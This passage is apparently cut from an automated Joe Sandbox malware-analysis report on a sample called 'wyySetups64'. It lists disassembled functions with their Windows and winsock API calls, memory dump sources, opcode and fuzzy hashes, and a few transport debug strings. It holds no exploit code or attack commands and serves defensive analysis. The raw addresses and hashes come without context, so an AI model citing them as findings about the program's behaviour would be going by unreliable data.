                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 542259498-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 03374443
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 0337444C
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 0337444E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 0337445D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00001770), ref: 033744AB
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 033744C8
                                                                                                                                                                                                                • Part of subcall function 03373F60: GetCurrentThreadId.KERNEL32 ref: 03373F65
                                                                                                                                                                                                                • Part of subcall function 03373F60: send.WS2_32(?,033949C0,00000010,00000000), ref: 03373FC6
                                                                                                                                                                                                                • Part of subcall function 03373F60: SetEvent.KERNEL32(?), ref: 03373FE9
                                                                                                                                                                                                                • Part of subcall function 03373F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03373FF5
                                                                                                                                                                                                                • Part of subcall function 03373F60: WSACloseEvent.WS2_32(?), ref: 03374003
                                                                                                                                                                                                                • Part of subcall function 03373F60: shutdown.WS2_32(?,00000001), ref: 0337401B
                                                                                                                                                                                                                • Part of subcall function 03373F60: closesocket.WS2_32(?), ref: 03374025
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 033744DC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 542259498-0
                                                                                                                                                                                                              • Opcode ID: c891bd4b2b9bb78cba250863596461a7b3b1f866cdd958a208f2c9f617a7c3f0
                                                                                                                                                                                                              • Instruction ID: cf1c4d8680baccb441712283c8db4b40af6b6252a188f07fc59ba03bdf81656b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c891bd4b2b9bb78cba250863596461a7b3b1f866cdd958a208f2c9f617a7c3f0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90216476600708ABC230EF79DCC4B97B3E8EF89720F100A1EE589C7640D675F4459BA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?), ref: 00BD4E79
                                                                                                                                                                                                              • TryEnterCriticalSection.KERNEL32(?,?), ref: 00BD4E98
                                                                                                                                                                                                              • TryEnterCriticalSection.KERNEL32(?), ref: 00BD4EA2
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 00BD4EB9
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BD4EC2
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BD4EC9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4082018349-0
                                                                                                                                                                                                              • Opcode ID: 4bc90e43f67cb467076a99ac15caf6d90062f9d9fca423b96a45eca4866e38f3
                                                                                                                                                                                                              • Instruction ID: 9da6d2d1c9a4428164ff339640e1b2fe3642301a7cda16ea26b043e23239275f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bc90e43f67cb467076a99ac15caf6d90062f9d9fca423b96a45eca4866e38f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 361160326007449BC330EB79AD8596BF3ECFB88325B44066BF605C7651EB71D805C6A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?), ref: 03374E99
                                                                                                                                                                                                              • TryEnterCriticalSection.KERNEL32(?,?), ref: 03374EB8
                                                                                                                                                                                                              • TryEnterCriticalSection.KERNEL32(?), ref: 03374EC2
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 03374ED9
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 03374EE2
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 03374EE9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4082018349-0
                                                                                                                                                                                                              • Opcode ID: 707f6d4641795719bdcf1789fabb5b514d89553d7ecfcdff8f938b33469e3077
                                                                                                                                                                                                              • Instruction ID: 1da8f176dba9f6d9c463732ffee714b754c64503a3e094bd8ec03fa19ab3e7b2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 707f6d4641795719bdcf1789fabb5b514d89553d7ecfcdff8f938b33469e3077
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23116D327007089BD330EB7AECC496BF3ECEB88721B040A2BE645C6550DA76E805C7A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 0337DD32
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 0337DE35
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                              • String ID: Main
                                                                                                                                                                                                              • API String ID: 1452528299-521822810
                                                                                                                                                                                                              • Opcode ID: 8033ef0bdb21022605198f68d82f945de9d593d0c46af187de0741f23e255f89
                                                                                                                                                                                                              • Instruction ID: 5a046cf80e71a709acee3e157cad3748c62034f671db9ca7615a79689281e3b1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8033ef0bdb21022605198f68d82f945de9d593d0c46af187de0741f23e255f89
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5341C131A50209EFE720DF58DCC1BAAB3E8FF94314F0846AAE8459B751E775E941CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD3F65
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,74DEDFA0,00BD3648), ref: 00BD4054
                                                                                                                                                                                                                • Part of subcall function 00BD2B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00BD2B96
                                                                                                                                                                                                                • Part of subcall function 00BD2B80: SwitchToThread.KERNEL32 ref: 00BD2BAA
                                                                                                                                                                                                              • send.WS2_32(?,00BE7440,00000010,00000000), ref: 00BD3FC6
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00BD3FE9
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD3FF5
                                                                                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 00BD4003
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 00BD401B
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 00BD4025
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3254528666-0
                                                                                                                                                                                                              • Opcode ID: 107276a2256c58a6678f11c24229f41d39f5d25ba330f0a80981c6933fa4659f
                                                                                                                                                                                                              • Instruction ID: 9dfebc4420cc8c20e2aff90f139f30fdcdca026e0eb9a5286ec2e451f278caf4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 107276a2256c58a6678f11c24229f41d39f5d25ba330f0a80981c6933fa4659f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D215570200B009BD3309B68D888B9BB7F5FF44B14F04494EF2868BB91EBB9E845CB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 03373F65
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,74DEDFA0,03373648), ref: 03374054
                                                                                                                                                                                                                • Part of subcall function 03372BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03372BD6
                                                                                                                                                                                                                • Part of subcall function 03372BC0: SwitchToThread.KERNEL32 ref: 03372BEA
                                                                                                                                                                                                              • send.WS2_32(?,033949C0,00000010,00000000), ref: 03373FC6
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 03373FE9
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 03373FF5
                                                                                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 03374003
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 0337401B
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 03374025
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3254528666-0
                                                                                                                                                                                                              • Opcode ID: 47795253848a485cdb9f24e192315d46ac9852025c19c4e2f293ed94eb68ad1b
                                                                                                                                                                                                              • Instruction ID: e1bc21e90331e11e2923f63da68d960c314ac03ecee21828c21783e06837c1a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47795253848a485cdb9f24e192315d46ac9852025c19c4e2f293ed94eb68ad1b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F421D775200B04DBD334EB69D8C8B5BB7B9BB44711F144E1DE692CA680C7BAE445DB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4074
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4087
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4090
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4099
                                                                                                                                                                                                                • Part of subcall function 00BD1350: HeapFree.KERNEL32(?,00000000,?,?,?,00BD40A6,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD1390
                                                                                                                                                                                                                • Part of subcall function 00BD1420: HeapFree.KERNEL32(?,00000000,?,?,?,00BD40B1,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD143D
                                                                                                                                                                                                                • Part of subcall function 00BD1420: _free.LIBCMT ref: 00BD1459
                                                                                                                                                                                                              • HeapDestroy.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD40B9
                                                                                                                                                                                                              • HeapCreate.KERNEL32(?,?,?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD40D4
                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4150
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4157
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1219087420-0
                                                                                                                                                                                                              • Opcode ID: f3d2157dcae2d40242dbd038715d64a3dbe72f4fbd9e7e8d2f4615d895571481
                                                                                                                                                                                                              • Instruction ID: 15e5215a37fcfa742dcede7a535289a623864ffbed25af8d58a429be7de7bace
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3d2157dcae2d40242dbd038715d64a3dbe72f4fbd9e7e8d2f4615d895571481
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C312674600A06AFD705DB78C898B96FBE8FF48314F14829AE5298B361DB35B855CFD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374074
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374087
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374090
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374099
                                                                                                                                                                                                                • Part of subcall function 03371350: HeapFree.KERNEL32(?,00000000,?,?,?,033740A6,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03371390
                                                                                                                                                                                                                • Part of subcall function 03371420: HeapFree.KERNEL32(?,00000000,?,?,?,033740B1,?,00000000,03374039,?,74DEDFA0,03373648), ref: 0337143D
                                                                                                                                                                                                                • Part of subcall function 03371420: _free.LIBCMT ref: 03371459
                                                                                                                                                                                                              • HeapDestroy.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 033740B9
                                                                                                                                                                                                              • HeapCreate.KERNEL32(?,?,?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 033740D4
                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374150
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374157
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1219087420-0
                                                                                                                                                                                                              • Opcode ID: 116cbfa180d1c01bbb261e32f5952eb8106c98cfbe6a661a85acac52a303a025
                                                                                                                                                                                                              • Instruction ID: c5654930a3dd68abda9a1d3539a6e59cefcc6783377c8f2594348bfd564f640f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 116cbfa180d1c01bbb261e32f5952eb8106c98cfbe6a661a85acac52a303a025
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1314875600A0AEFD749EB35D898B96F7A8FF48310F04865AE429CB250DB39B851CFD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$_malloc
                                                                                                                                                                                                              • String ID: ($6$gfff$gfff
                                                                                                                                                                                                              • API String ID: 3506388080-713438465
                                                                                                                                                                                                              • Opcode ID: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                                                                                                                                              • Instruction ID: dd1ad63eba9e07079fd21c1513c8aa9b0f86df979a1e32e36abfabad1186f68b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8D18CB1E00318AFDB14DFE9DC85AAEFBB9FF48300F144129E505AB291D770A945CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD1610: __vswprintf.LIBCMT ref: 00BD1646
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00BD2330
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __FF_MSGBANNER.LIBCMT ref: 00BD6E9C
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __NMSG_WRITE.LIBCMT ref: 00BD6EA3
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD6EC8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                                                                                                              • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                                                                                                              • API String ID: 3723585974-868042568
                                                                                                                                                                                                              • Opcode ID: 77d4a237b6bf7012914381d3cb438f4932e4586c37081841505e35dee5b96986
                                                                                                                                                                                                              • Instruction ID: a5c802ba553c8ebba17dfaa5fe5661b30dce77b829bac0f04792f1f60578a437
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77d4a237b6bf7012914381d3cb438f4932e4586c37081841505e35dee5b96986
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBB17C71A002459FCB18CF69D8816AABBE5FF94310F0886EBED199B346E731DD418B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03371610: __vswprintf.LIBCMT ref: 03371646
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 03372330
                                                                                                                                                                                                                • Part of subcall function 0337F673: __FF_MSGBANNER.LIBCMT ref: 0337F68C
                                                                                                                                                                                                                • Part of subcall function 0337F673: __NMSG_WRITE.LIBCMT ref: 0337F693
                                                                                                                                                                                                                • Part of subcall function 0337F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F6B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                                                                                                              • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                                                                                                              • API String ID: 3723585974-868042568
                                                                                                                                                                                                              • Opcode ID: c56041a21e61f83af74beebf4583e5bd12f92129213fb8b314709e85b217d914
                                                                                                                                                                                                              • Instruction ID: b664ecbfff3d492613ecc851fafea73c86a25c5a0ac0de1cada968a7bb0b946a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c56041a21e61f83af74beebf4583e5bd12f92129213fb8b314709e85b217d914
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCB18075E002058BDF38DF69D8C06ABB7A5BF44210F084AAEDD59DB34AD739D941CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1878
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD18B6
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD18F5
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1935
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD195D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1981
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD19B9
                                                                                                                                                                                                                • Part of subcall function 00BD6E49: HeapFree.KERNEL32(00000000,00000000,?,00BD9900,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD6E5F
                                                                                                                                                                                                                • Part of subcall function 00BD6E49: GetLastError.KERNEL32(00000000,?,00BD9900,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000), ref: 00BD6E71
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: 1ae334ef2e48a13d88dad88e00ceec7b2a243e59f530a43b95db1bdea9b36711
                                                                                                                                                                                                              • Instruction ID: bf6234e4323c6cd7ebbeadf1b138c57cab777735452c33cdcb033161f98efd87
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ae334ef2e48a13d88dad88e00ceec7b2a243e59f530a43b95db1bdea9b36711
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C45149B6A00111AFD714DF5CC4D0855FBE6FF8931472984AED50A6B321EB32BD02CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 03371878
                                                                                                                                                                                                              • _free.LIBCMT ref: 033718B6
                                                                                                                                                                                                              • _free.LIBCMT ref: 033718F5
                                                                                                                                                                                                              • _free.LIBCMT ref: 03371935
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337195D
                                                                                                                                                                                                              • _free.LIBCMT ref: 03371981
                                                                                                                                                                                                              • _free.LIBCMT ref: 033719B9
                                                                                                                                                                                                                • Part of subcall function 0337F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03383E4C,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F64F
                                                                                                                                                                                                                • Part of subcall function 0337F639: GetLastError.KERNEL32(00000000,?,03383E4C,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000), ref: 0337F661
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
